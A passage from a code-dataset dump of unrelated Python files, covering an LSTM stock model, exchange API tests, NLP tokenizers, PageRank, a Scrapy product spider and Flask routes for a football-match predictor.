tf.concat([self.inputs,stock_label_embeds_x],axis=2)\r\n\r\n '''根据lstm_size、keep_prob、num_layers构建含Dropout包装器的LSTM神经网络'''\r\n def _create_one_cell():\r\n cell=tf.nn.rnn_cell.DropoutWrapper(\r\n tf.nn.rnn_cell.LSTMCell(self.lstm_size,state_is_tuple=True),\r\n output_keep_prob=self.keep_prob\r\n )\r\n return cell\r\n cell=tf.nn.rnn_cell.MultiRNNCell([_create_one_cell() for i in range(self.num_layers)],state_is_tuple=True) if self.num_layers > 1 else _create_one_cell()\r\n\r\n '''获得LSTM网络的输出和状态'''\r\n val,_ = 
tf.nn.dynamic_rnn(cell,self.inputs_with_embeds,dtype=tf.float32)\r\n\r\n '''根据LSTM网络的输出计算出与target维度匹配的输出'''\r\n # Before transpose, val.get_shape() = (batch_size, num_steps, lstm_size)\r\n # After transpose, val.get_shape() = (num_steps, batch_size, lstm_size)\r\n val = tf.transpose(val,[1,0,2])\r\n last = tf.gather(val,int(val.get_shape()[0])-1,name='last_lstm_output')\r\n weight=tf.Variable(tf.truncated_normal([self.lstm_size,1]))\r\n bias=tf.Variable(tf.constant(0.1,shape=[1]))\r\n self.prediction=tf.matmul(last,weight)+bias\r\n\r\n '''模型的代价函数和优化器'''\r\n self.loss=tf.reduce_mean(tf.square(self.prediction-self.targets))\r\n self.optimizer=tf.train.RMSPropOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\r\n\r\n def train(self,max_epoch,init_learning_rate,decay_rate,decay_epoch,batch_ratio,keep_prob,interval,future):\r\n ### 获取数据,设定好batch_size与训练epoch,将数据feed进图开始训练和测试\r\n\r\n '''获取数据,初始化模型参数'''\r\n stock_code,stock_data,mean_fluctuation=Data_Processor.get_stocks(\r\n input_size=self.input_size,num_steps=self.num_steps,train_ratio=self.train_ratio,interval=interval,future=future)\r\n tf.global_variables_initializer().run()\r\n\r\n '''合并每只股票的测试样本为一个统一的测试集'''\r\n merge_test_x = []\r\n merge_test_y = []\r\n merge_test_labels_x = []\r\n for test_label, test_data in enumerate(stock_data):\r\n merge_test_x += list(test_data.test_x)\r\n merge_test_y += list(test_data.test_y)\r\n merge_test_labels_x += [[test_label] * self.num_steps] * len(test_data.test_x)\r\n test_feed_dic = {\r\n self.learning_rate: 0.0,\r\n self.keep_prob: 1.0,\r\n self.inputs: np.array(merge_test_x),\r\n self.targets: np.array(merge_test_y),\r\n self.symbols_x: np.array(merge_test_labels_x),\r\n }\r\n\r\n # 开始训练\r\n for epoch in range(max_epoch):\r\n\r\n '''每轮更新一次学习率'''\r\n learning_rate = init_learning_rate * (\r\n decay_rate ** max(float(epoch + 1 - decay_epoch), 0.0)\r\n )\r\n\r\n for label,data in enumerate(stock_data):\r\n # 准备训练集\r\n train_x = tf.placeholder(data.train_x.dtype,data.train_x.shape)\r\n train_y = tf.placeholder(data.train_y.dtype,data.train_y.shape)\r\n\r\n # 取batch_size个样本的训练集\r\n batch_size=int(len(data.train_x)*batch_ratio)\r\n dataset=tf.data.Dataset.from_tensor_slices((train_x,train_y))\r\n dataset=dataset.batch(batch_size)\r\n iterator=dataset.make_initializable_iterator()\r\n self.sess.run(iterator.initializer, feed_dict={train_x: data.train_x, train_y: data.train_y})\r\n next_batch = iterator.get_next()\r\n batch_x, batch_y = self.sess.run(next_batch)\r\n # 构建每个输入对应的标签\r\n batch_label_x = np.array([[label]*self.num_steps] * batch_x.shape[0])\r\n\r\n train_feed_dic = {\r\n self.learning_rate:learning_rate,\r\n self.symbols_x:batch_label_x,\r\n #self.symbols_y:batch_label_y,\r\n self.keep_prob:keep_prob,\r\n self.inputs:batch_x,\r\n self.targets:batch_y,\r\n }\r\n # 训练\r\n train_loss,optimizer=self.sess.run(\r\n [self.loss,self.optimizer],train_feed_dic\r\n )\r\n print('After ', epoch, 'the train_loss: ', train_loss)\r\n # 测试\r\n test_pred, test_loss = self.sess.run([self.prediction, self.loss], test_feed_dic)\r\n print('After ',epoch,'the test_loss: ',test_loss)\r\n\r\n #最终再测试一次\r\n final_pred,final_loss=self.sess.run([self.prediction, self.loss], test_feed_dic)\r\n print('Final,the test_loss: ',final_loss)\r\n\r\n #预测数据和target分别存入txt方便观察\r\n np.savetxt('out\\pred.txt',final_pred)\r\n np.savetxt('out\\out.txt',merge_test_y)\r\n\r\n #保存一下模型\r\n Saver=tf.train.Saver()\r\n Saver.save(sess=self.sess,save_path='.\\save\\params')\r\n\r\n # 计算平均预测误差\r\n sum_error=0\r\n for i in 
range(final_pred.shape[0]):\r\n print('final_pred:',final_pred[i][0],' and the target:',merge_test_y[i][0])\r\n sum_error += (final_pred[i][0] - merge_test_y[i][0])\r\n mean_error=sum_error/final_pred.shape[0]\r\n\r\n print('所有股票涨幅的平均波动为:',mean_fluctuation)\r\n print('在测试集上对于涨跌趋势的预测的平均误差为:',mean_error)\r\n\r\n\r\n\r\ndef main():\r\n with tf.Session() as sess:\r\n lstm_model=LSTM_net(\r\n sess,\r\n stock_count=50,\r\n lstm_size=128,\r\n num_layers=1,\r\n num_steps=250,#一年250个交易日\r\n input_size=10,\r\n embed_size=3,\r\n train_ratio=0.9,\r\n logs_dir='./logs',\r\n plots_dir='. /plots'\r\n )\r\n lstm_model.train(max_epoch=30,\r\n init_learning_rate=0.001,\r\n decay_rate=0.98,\r\n decay_epoch=10,\r\n batch_ratio=0.8,\r\n keep_prob=0.8,\r\n interval=30,\r\n future=30\r\n )\r\nmain()","sub_path":"Graduate_Proj_V1/model_lstm.py","file_name":"model_lstm.py","file_ext":"py","file_size_in_byte":8158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"550977827","text":"import pytest\n\nimport cryptocom.exchange as cro\n\n\n@pytest.mark.asyncio\nasync def test_get_pairs(exchange: cro.Exchange):\n pairs = await exchange.get_pairs()\n keys = [\n 'quote_currency', 'base_currency',\n 'price_decimals', 'quantity_decimals'\n ]\n for pair_keys in pairs.values():\n assert sorted(keys) == sorted(pair_keys)\n\n for pair in pairs:\n assert pair in cro.Pair\n\n\n@pytest.mark.asyncio\nasync def test_get_tickers(exchange: cro.Exchange):\n tickers = await exchange.get_tickers()\n keys = sorted(['b', 'k', 'a', 't', 'v', 'h', 'l', 'c'])\n for data in tickers.values():\n assert keys == sorted(data)\n sorted(p.value for p in tickers) == sorted(p.value for p in cro.Pair)\n ticker = await exchange.get_tickers(cro.Pair.BTC_USDT)\n assert keys == sorted(ticker)\n\n\n@pytest.mark.asyncio\nasync def test_get_trades(exchange: cro.Exchange):\n trades = await exchange.get_trades(cro.Pair.CRO_USDT)\n keys = sorted(['p', 'q', 's', 'd', 't'])\n for trade in trades:\n assert sorted(trade) == keys\n\n\n@pytest.mark.asyncio\nasync def test_get_price(exchange: cro.Exchange):\n price = await exchange.get_price(cro.Pair.CRO_USDT)\n assert price > 0\n\n\n@pytest.mark.asyncio\nasync def test_get_orderbook(exchange: cro.Exchange):\n data = await exchange.get_orderbook(cro.Pair.CRO_USDT, depth=50)\n asks = data['asks']\n bids = data['bids']\n # price, quantity, number of orders\n assert asks and bids\n assert len(asks[0]) == 3\n assert len(bids[0]) == 3\n\n\n@pytest.mark.asyncio\nasync def test_listen_candles(exchange: cro.Exchange):\n candles = []\n pairs = (cro.Pair.CRO_USDC, cro.Pair.USDC_USDT, cro.Pair.BTC_USDT)\n count = 0\n default_count = 300\n\n async for candle in exchange.listen_candles(cro.Period.MINS, *pairs):\n candles.append(candle)\n count += 1\n if count == len(pairs) * default_count:\n break\n\n for pair in pairs:\n assert len([\n c for c in candles if c.pair == pair\n ]) == default_count\n\n\n@pytest.mark.asyncio\nasync def test_listen_trades(exchange: cro.Exchange):\n trades = []\n count = 0\n pairs = [cro.Pair.CRO_USDT, cro.Pair.BTC_USDT]\n pairs_seen = set()\n async for trade in exchange.listen_trades(*pairs):\n trades.append(trade)\n pairs_seen.add(trade.pair)\n if count > 100:\n break\n count += 1\n\n assert len(pairs_seen) == len(pairs)\n\n\n@pytest.mark.asyncio\nasync def test_listen_orderbook(exchange: cro.Exchange):\n pairs = [cro.Pair.CRO_USDT, cro.Pair.BTC_USDT]\n orderbooks = []\n depth = 50\n\n async for orderbook in exchange.listen_orderbook(*pairs, 
depth=depth):\n orderbooks.append(orderbook)\n if set(pairs) == set(o.pair for o in orderbooks):\n break\n\n for book in orderbooks:\n assert book.buys and book.sells\n assert book.sells[0].price > book.buys[0].price\n assert book.spread > 0\n assert len(book.sells) == len(book.buys) == depth\n","sub_path":"tests/test_market.py","file_name":"test_market.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"171847129","text":"from cnlp.data.word_dict import WordDict\nfrom cnlp.data.tokenizers import dag\nfrom cnlp.data.tokenizers import mechanical\n\n\nclass Tokenizer(object):\n def __init__(self) -> None:\n self.wd = WordDict()\n\n def cut(self,\n text: str = None,\n methods: str = \"dag\") -> list:\n if text:\n if methods == \"mechanical\":\n tokenizer_data = mechanical.cut_with_forward_match(text, self.wd.get_common_word_dict_list())\n elif methods == \"dag\":\n tokenizer_data = dag.cut(text, *self.wd.get_common_word_freq_dict())\n else:\n raise ValueError(f\"Error cut methods: {methods}\")\n else:\n raise ValueError(\"text is empty !\")\n\n return tokenizer_data\n","sub_path":"cnlp/data/tokenizers/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"605288778","text":"'''\nAuthor: Christoph Stich\nDate: 2015-06-16\nThis is a port from Edwin Chen's Scala code to Python 3\nMy contribution:\n - I fixed a bug where only a symmetric relationship would\n contribute to the propagation of the personalized PageRank score. Now you\n can either just use the outgoing links or any links\n - Breaks ties randomly\n\nAlso known as Rooted Page Rank. The citation is as follows:\n Liben-Nowell D, Kleinberg J M. The link-prediction problem for social\n networks. Journal of the American Society for Information Science and\n Technology, 2007, 58: 1019{1031\n'''\n\nimport copy\nimport collections\nimport random\n\n\nclass PersonalizedPageRank(object):\n '''\n Given a directed graph of follower and following edges, compute personalized\n PageRank scores around specified starting nodes.\n\n A personalized PageRank is similar to standard PageRank, except that when\n randomly teleporting to a new node, the surfer always teleports back to the\n given source node being personalized (rather than to a node chosen uniformly\n at random, as in the standard PageRank algorithm)\n\n In other words, the random surfer in the personalized PageRank model works\n as follows:\n - He starts at the source node X that we want to calculate a\n personalized PageRank around.\n - At step i: with probability p, the surfer moves to a neighboring node\n chosen uniformly at random;\n with probability $1-p$, the surfer instead teleports back\n to the original source node X.\n\n The limiting probability that the surfer is at node N is the\n personalized PageRank score of node N around X.\n '''\n\n def __init__(self, inLinks, outLinks, weights=None,\n numOfIterations=3, maxNodesToKeep=25,\n directed=False, alpha=0.5, excludeSelf=True):\n '''\n @maxNodesToKeep: How many nodes to keep. 
If None, returns all\n @directed: If true only consider outgoing links as the original PageRank\n '''\n self.inLinks = copy.deepcopy(inLinks) # Followers as a dictionary where\n # key: node, values: peers\n self.outLinks = copy.deepcopy(outLinks) # Followees as a dictionary\n # where key: node, values: peers\n self.weights = weights # Is a nested dictionary of the form\n # weights[user][peer] = tieStrength\n self.numOfIterations = numOfIterations\n self.maxNodesToKeep = maxNodesToKeep\n self.directed = directed\n self.alpha = alpha\n self.exclude = excludeSelf\n\n def pageRank(self, user, returnScores=False, weighted=False):\n '''\n Calculate a personalized PageRank around the given user, and return a\n list of the nodes with the highest personalized PageRank scores.\n Care was taken to break ties randomly.\n @user: The user to calculat the Personalized PageRank for\n algorithm does. If false, uses any tie to propagate the score\n @return A list of (node, probability of landing at this node after\n running a personalize PageRank for K iterations) pairs.\n '''\n probs = {}\n probs[user] = 1\n pageRankProbs = self.pageRankHelper(user, probs, self.numOfIterations,\n self.directed, self.alpha, weighted)\n pageRankProbs = list(pageRankProbs.items())\n # Reshuffle results of the PPR to make sure ties are broken at random\n random.shuffle(pageRankProbs)\n\n if self.exclude:\n pageRankProbs = [e for e in pageRankProbs if str(e[0]) != str(user)]\n # The str cast is probably unnecessary but I am afraid of dynamic\n # type checking\n\n if returnScores:\n return pageRankProbs\n else:\n # Return the n-highest scoring nodes\n pageRankProbs = sorted(pageRankProbs, key=lambda x: x[1],\n reverse=True)[:self.maxNodesToKeep]\n return [e[0] for e in pageRankProbs]\n\n def pageRankHelper(self, start, probs, numIterations, directed, alpha,\n weighted):\n if numIterations <= 0:\n return probs\n else:\n # This map holds the updated set of probabilities, after the\n # current iteration.\n probsPropagated = collections.defaultdict(float)\n # With probability 1 - alpha, we teleport back to the start node.\n probsPropagated[start] = 1 - alpha\n\n # Propagate the previous probabilities...\n for node, prob in probs.items():\n forwards = self.getOutLinks(node)\n if directed:\n neighbors = list()\n neighbors + forwards\n else:\n backwards = self.getInLinks(node)\n neighbors = set(forwards + backwards)\n\n if len(neighbors) != 0:\n probToPropagate = alpha * prob / len(neighbors)\n # With probability alpha, we move to a follower...\n # And each node equally distributes its current probability to\n # its neighbors.\n for neighbor in neighbors:\n # If edge strength is important then we have to weight the\n # probabilites we propagate. The tie strengths have to add\n # up to 1 for each node. 
Effectively we are talking about\n # relative tie strengths\n if weighted:\n weight = self.weights[node][neighbor]\n else:\n weight = 1\n probsPropagated[neighbor] += (probToPropagate * weight)\n\n return self.pageRankHelper(start, probsPropagated,\n numIterations - 1, directed, alpha, weighted)\n\n def getInLinks(self, user):\n try:\n return self.inLinks[user]\n except KeyError:\n return list()\n\n def getOutLinks(self, user):\n try:\n return self.outLinks[user]\n except KeyError:\n return list()\n","sub_path":"PersonalizedPageRank.py","file_name":"PersonalizedPageRank.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"264125815","text":"# -*- encoding:utf-8 -*-\n# author: unclejimao\n\n# 使用逆向最大匹配算法实现中文分词\nimport load_dic\n\n# 逆向最大匹配算法实现中文切词方法\ndef cut_words(raw_sentence, words_dic):\n \"\"\"\n\n :param raw_sentence: 待切分序列\n :param words_dic: 自定义词典\n :return: 切词列表\n \"\"\"\n max_length = max(len(word) for word in words_dic) # 统计词典中词语的最大词长\n sentence = raw_sentence.strip()\n words_length = len(sentence) # 待切分序列长度\n cut_word_list = [] # 用于存储切词结果\n\n while words_length > 0:\n max_cut_length = min(words_length, max_length)\n sub_sentence = sentence[-max_cut_length:]\n\n while max_cut_length > 0:\n if sub_sentence in words_dic:\n cut_word_list.append(sub_sentence)\n break\n elif max_cut_length == 1:\n cut_word_list.append(sub_sentence)\n break\n else:\n max_cut_length -= 1\n sub_sentence = sub_sentence[-max_cut_length:]\n\n sentence = sentence[0:-max_cut_length] # 待切分序列去掉最后已经切除的词语\n words_length -= max_cut_length\n\n cut_word_list.reverse() # 由于RMM从后往前切词,list中的词语顺序是反的,因此输出前要reverse一下\n return cut_word_list\n\n\nif __name__ == '__main__':\n words_dic = load_dic.init()\n\n with open(\"./train.txt\", \"r\", encoding=\"utf8\") as train_set:\n for line in train_set:\n print(\" \".join(cut_words(line, words_dic)))\n","sub_path":"RMM/RMM.py","file_name":"RMM.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"24095295","text":"import requests\nimport json\nimport logging\nlog = logging.getLogger(__name__)\nsh = logging.StreamHandler()\nlog.addHandler(sh)\n\nrequests.packages.urllib3.disable_warnings()\n\nbase_url = 'https://localhost:8443/api'\n\ndef test_groups():\n _id = 'test'\n r = requests.get(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.status_code == 404\n payload = {\n '_id': _id\n }\n payload = json.dumps(payload)\n r = requests.post(base_url + '/groups?user=admin@user.com&root=true', data=payload, verify=False)\n assert r.ok\n r = requests.get(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.ok\n payload = {\n 'name': 'Test group',\n }\n payload = json.dumps(payload)\n r = requests.put(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', data=payload, verify=False)\n assert r.ok\n r = requests.delete(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.ok\n","sub_path":"test/integration_tests/test_groups.py","file_name":"test_groups.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"602437950","text":"import xml.etree.cElementTree as ET\nimport pprint\nfrom collections import defaultdict\n\"\"\"\nIn this file, the program goes through and counts every different \ninstance 
of the k values in the tag elements.\n\nThis is required for later data auditing.\n\nThis code came from earlier exercises in Open Case Study.\n\"\"\"\n\n\n'''\nProcess element tags to see all the different k values.\n\nArgs:\n\tfilename (osm file): File to inspect.\n\nReturns:\n\tdict: All the k values as keys, and their number of occurances as values of the dictionary.\n'''\ndef process_k(filename):\n\ttag_k_types = defaultdict(int)\n\n\tfor _, element in ET.iterparse(filename):\n\t\tif element.tag == \"tag\":\n\t\t\ttag_k_types[ element.attrib['k'] ] += 1\n\n\treturn tag_k_types\n\n\ntag_k = process_k('TB_map.osm')\npprint.pprint(tag_k)","sub_path":"Code/tag_k_types.py","file_name":"tag_k_types.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"21577427","text":"import os\nimport re\nimport logging\nfrom datetime import datetime\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.utils import extract_price\nfrom demoritems import DemoRMeta, Review, ReviewLoader\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\nimport demjson\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DebenhamsSpider(BaseSpider):\n name = 'demo_r-debenhams.com'\n allowed_domains = ['debenhams.com', 'debenhamsplus.com', 'debenhams.ugc.bazaarvoice.com']\n start_urls = [\n 'http://www.debenhams.com',\n ]\n\n user_agent = 'spd'\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n\n categories = response.xpath('//li[div[contains(text(), \"Audio, vision & technology\")]]//a/@href').extract()\n for category in categories:\n yield Request(response.urljoin(category))\n\n categories = response.xpath('//div[@id=\"subCategorycategories\"]/ul/li/a/@href').extract()\n categories += response.xpath('//li[@id=\"categories\"]/ul/li/a/@href').extract()\n categories += response.xpath('//div[@class=\"cat_detail\"]/div/a/@href').extract()\n for category in categories:\n url = urljoin_rfc(get_base_url(response), category)\n yield Request(url)\n\n # products new parse method\n products = response.xpath('//div[contains(@id, \"PSPProductList\")]')\n for product in products:\n loader = ProductLoader(item=Product(), selector=product)\n\n name = \"\".join(product.xpath(\".//div[contains(@class, 'product_name')]//text()\").extract()).strip()\n brand = product.xpath('div/a/div[@class=\"brand_name\"]/text()').extract()[0].strip()\n\n url = product.xpath(\".//a/@href\").extract()\n url = urljoin_rfc(get_base_url(response), url[0])\n\n sku = product.xpath(\".//div[contains(@id, 'psp')]/@id\").re(\"psp_(.+)\")[0]\n\n price = product.xpath(\".//span[@class='price_now']/text()\").re(u'Now\\xa0\\xa3(.*)')\n if not price:\n price = product.xpath(\".//span[@class='price-actual' and @itemprop='price']/text()\").extract()\n\n if price:\n price = price[0]\n else:\n price = ''\n loader.add_value('stock', 0)\n\n category = response.xpath('//div[@id=\"box_productSelectionPage\"]/div/h1/text()').extract()\n category = category[0].strip() if category else ''\n\n loader.add_value('name', name)\n loader.add_value('brand', brand)\n# loader.add_value('category', category)\n loader.add_value('url', url)\n loader.add_xpath('image_url', 'div//img[@class=\"proImg\"]/@src')\n loader.add_value('sku', sku)\n 
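# NOTE (added): the PSP id is reused as both sku and identifier below; assumed stable across crawls so re-runs update the same product\n            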
loader.add_value('identifier', sku)\n loader.add_value('price', price)\n\n\n item = loader.load_item()\n metadata = DemoRMeta()\n metadata['reviews'] = []\n metadata['promotion'] = ''.join(product.xpath('.//span[@class=\"discount_savings\"]/text()').extract())\n item = loader.load_item()\n item['metadata'] = metadata\n\n yield Request(item['url'], meta={'item':item}, callback=self.parse_product)\n\n for page in response.xpath('//div[@id=\"pagination\"]/a/@href').extract():\n url = urljoin_rfc(get_base_url(response), page)\n yield Request(url)\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n item = response.meta['item']\n\n item['category'] = ' > '.join([x.strip() for x in response.xpath('//div[@class=\"breadcrumb_links\"]//a/text()').extract()])\n\n # stock\n stock_data = response.xpath('//div[contains(@id, \"entitledItem_\")]/text()').extract()\n if stock_data:\n data = demjson.decode(stock_data[0])\n if data:\n stock = data[0]['inventory_stock']\n try:\n if float(stock):\n #item['stock'] = 1\n pass\n else:\n item['stock'] = 0\n except ValueError:\n item['stock'] = 0\n\n reviews_url = 'http://debenhams.ugc.bazaarvoice.com/9364redes-en_gb/%s/reviews.djs?format=embeddedhtml&scrollToTop=true'\n part_number = response.url.split('_')[-2]\n yield Request(reviews_url % part_number, callback=self.parse_review_page, meta={'product': item})\n\n def parse_review_page(self, response):\n item_ = response.meta.get('product', '')\n hxs = HtmlXPathSelector(text=self._extract_html(response))\n reviews = response.xpath('//div[@class=\"BVRRReviewDisplayStyle5\"]')\n for review in reviews:\n l = ReviewLoader(item=Review(), response=response, date_format='%m/%d/%Y')\n rating = review.select(\".//span[contains(@class,'BVRRRatingNumber')]/text()\").extract()[0]\n date = review.select(\".//span[contains(@class,'BVRRValue BVRRReviewDate')]/text()\").extract()[0]\n review = review.select(\".//span[contains(@class,'BVRRReviewText')]/text()\")[0].extract()\n\n l.add_value('rating', rating)\n l.add_value('url', response.url)\n l.add_value('date', datetime.strptime(date, '%d %B %Y').strftime('%m/%d/%Y'))\n l.add_value('full_text', review)\n item_['metadata']['reviews'].append(l.load_item())\n\n next = response.xpath('//span[@class=\"BVRRPageLink BVRRNextPage\"]/a/@data-bvjsref').extract()\n if next:\n yield Request(next[0], callback=self.parse_review_page, meta={'product': item_})\n else:\n yield item_\n\n def _extract_html(self, response):\n review_html = ''\n for line in response.body.split('\\n'):\n if 'var materials=' in line:\n review_html = line.split('\"BVRRSecondaryRatingSummarySourceID\":\" ')[-1].split('\\n}')[0].replace('\\\\', '')\n return review_html\n","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/demo_r/debenhams_spider.py","file_name":"debenhams_spider.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"615207829","text":"# Defineste rutele pentru pagina de index\n\nimport datetime\nimport os.path\nimport xml.etree.ElementTree as ET\nimport zipfile as z\n\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import request\n\nimport application.dialog_windows as dw\nimport global_library\nfrom application.admin import create_db\nfrom application.admin import delete_db\nfrom application.admin import import_matches\nfrom application.connected import download_future_match\nfrom application.connected import download_user_matches\nfrom 
application.connected import hattrick_connect\nfrom application.connected import hattrick_disconnect\nfrom application.estimation import estimation_engine\n\nindex_bp = Blueprint('index_bp', __name__, template_folder='templates', static_folder='static')\n\n\n# Functia intoarce numele echipei selectate pentru a-i afla viitoarele meciuri\ndef get_user_team_name():\n if global_library.team_id == global_library.user_data['team 1 id']:\n return global_library.user_data['team 1 name']\n elif global_library.team_id == global_library.user_data['team 2 id']:\n return global_library.user_data['team 2 name']\n else:\n return global_library.user_data['team 3 name']\n\n\n# Functia arata daca echipa test_team joaca acasa sau in deplasare\ndef home_or_away(match_id, test_team):\n real_home_team = ''\n match_list = ET.parse(global_library.matches_savepath).getroot()[5][5]\n for match in match_list.findall('Match'):\n if match_id == match[0].text:\n real_home_team = match[1][1].text\n break\n return 'Home' if test_team == real_home_team else 'Away'\n\n\n# index\n@index_bp.route('/')\ndef home():\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n\n\n# conectarea la Hattrick\n@index_bp.route('/LoginToHattrick')\ndef LoginToHattrick():\n connection_successful, global_library.user_data = hattrick_connect.connection_engine()\n if connection_successful:\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n else:\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True, answer=global_library.ans,\n match_orders=global_library.default_match_orders)\n\n\n# algoritmul de estimare\n@index_bp.route('/EstimationEngine', methods=['POST'])\ndef estimation():\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=estimation_engine.estimate_results(given_ratings=[i for i in request.form.values()]))\n\n\n# deconectarea de la Hattrick\n@index_bp.route('/DisconnectFromHattrick')\ndef disconnect_from_hattrick():\n hattrick_disconnect.disconnection_engine()\n return render_template('index.html', title=\"The Best Match Predictor\",\n ratings=global_library.ratings, positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n\n\n# importarea de meciuri in baza de date\n@index_bp.route('/import', methods=['POST'])\ndef import_matches_into_database():\n import_matches.import_engine(low_end=int(request.form['InferiorLimit']),\n high_end=int(request.form['SuperiorLimit']))\n dw.show_info_window_in_thread(title='Import terminat', message='Am importat toate meciurile alese')\n return render_template('admin.html', title='Admin Control Panel')\n\n\n# iesirea din panoul de control catre prima 
pagina\n@index_bp.route('/LogoutToIndex')\ndef logout():\n match_orders = global_library.default_match_orders\n return render_template('index.html', title=\"The Best Match Predictor\",\n ratings=global_library.ratings, positions=global_library.positions,\n statuses=global_library.statuses, from_index=True, match_orders=match_orders,\n answer=global_library.ans)\n\n\n# crearea bazei de date\n@index_bp.route('/create')\ndef create():\n create_db.create_database()\n return render_template('admin.html')\n\n\n# stergerea bazei de date\n@index_bp.route('/delete')\ndef delete():\n delete_db.delete_database()\n return render_template('admin.html')\n\n\n# Intoarce numele echipei selectate\n@index_bp.route('/Team', methods=['POST'])\ndef get_team_id():\n team_id = request.form['HattrickTeams']\n global_library.team_id = team_id\n global_library.user_team_name = get_user_team_name()\n user_matches = download_user_matches.download_user_matches(team_id)\n global_library.user_matches = user_matches\n match_orders = global_library.default_match_orders\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n user_matches=user_matches, match_orders=match_orders, answer=global_library.ans)\n\n\n# Intoarce numarul de identificare al unui meci selectat\n@index_bp.route('/GetMatch', methods=['POST'])\ndef get_match_id():\n match_id = request.form['FutureMatches']\n match_orders = download_future_match.download_future_match(match_id, global_library.team_id)\n place = home_or_away(match_id, global_library.user_team_name)\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n user_matches=global_library.user_matches, match_orders=match_orders, place=place,\n answer=global_library.ans)\n\n\n@index_bp.route('/backup')\ndef backup_database():\n archive_name = global_library.database_backup_path + '\\\\backup ' + datetime.datetime.now().strftime(\n '%Y-%m-%d %H-%M-%S') + '.zip'\n with z.ZipFile(file=archive_name, mode='w') as backup:\n backup.write(global_library.database_file_path,\n arcname='matches.db')\n dw.show_info_window_in_thread(title='Backup terminat', message='Am terminat backupul bazei de date.')\n return render_template('admin.html')\n\n\n@index_bp.route('/restore')\ndef restore_database():\n restore_database_file_name = dw.restore_backup_window_in_thread()\n with z.ZipFile(restore_database_file_name, 'r') as restore:\n restore.extractall(os.path.dirname(global_library.database_file_path))\n dw.show_info_window_in_thread(title='Restaurare incheiata', message='S-a incheiat restaurarea backupului ales')\n return render_template('admin.html')\n","sub_path":"application/index/index_routes.py","file_name":"index_routes.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"24644627","text":"__author__ = 'muhammad.bc'\nimport os\nimport platform\nimport sys\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\nimport helpform\nimport newimagedlg\nimport qrc_resources\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n\n QMainWindow.__init__(self, None)\n\n self.oamge = QImage()\n self.dirty = False\n self.filename = None\n 
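# NOTE (added): flags for pending vertical/horizontal mirroring of the displayed image\n        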
self.mirroredvertically = False\n        self.mirroredhorizontally = False\n\n        self.imageLabel = QLabel()\n        self.imageLabel.setMinimumSize(200, 200)\n        self.imageLabel.setAlignment(Qt.AlignCenter)\n        self.imageLabel.setContextMenuPolicy(Qt.ActionsContextMenu)\n        self.setCentralWidget(self.imageLabel)\n\n        self.logDockWidget = QDockWidget(\"Log\", self)\n        self.logDockWidget.setObjectName(\"LogDockwidgetArea\")\n        self.logDockWidget.setAllowedAreas(Qt.LeftDockWidgetArea | Qt.RightDockWidgetArea)\n\n        self.listWidget = QListWidget()\n        self.logDockWidget.setWidget(self.listWidget)\n        self.addDockWidget(Qt.RightDockWidgetArea, self.logDockWidget)\n\n        self.label = QLabel()\n        self.label.setFrameStyle(QFrame.StyledPanel | QFrame.Sunken)\n        self.status = self.statusBar()\n        self.status.setSizeGripEnabled(False)\n        self.status.addPermanentWidget(self.label)\n        self.status.showMessage(\"Ready\", 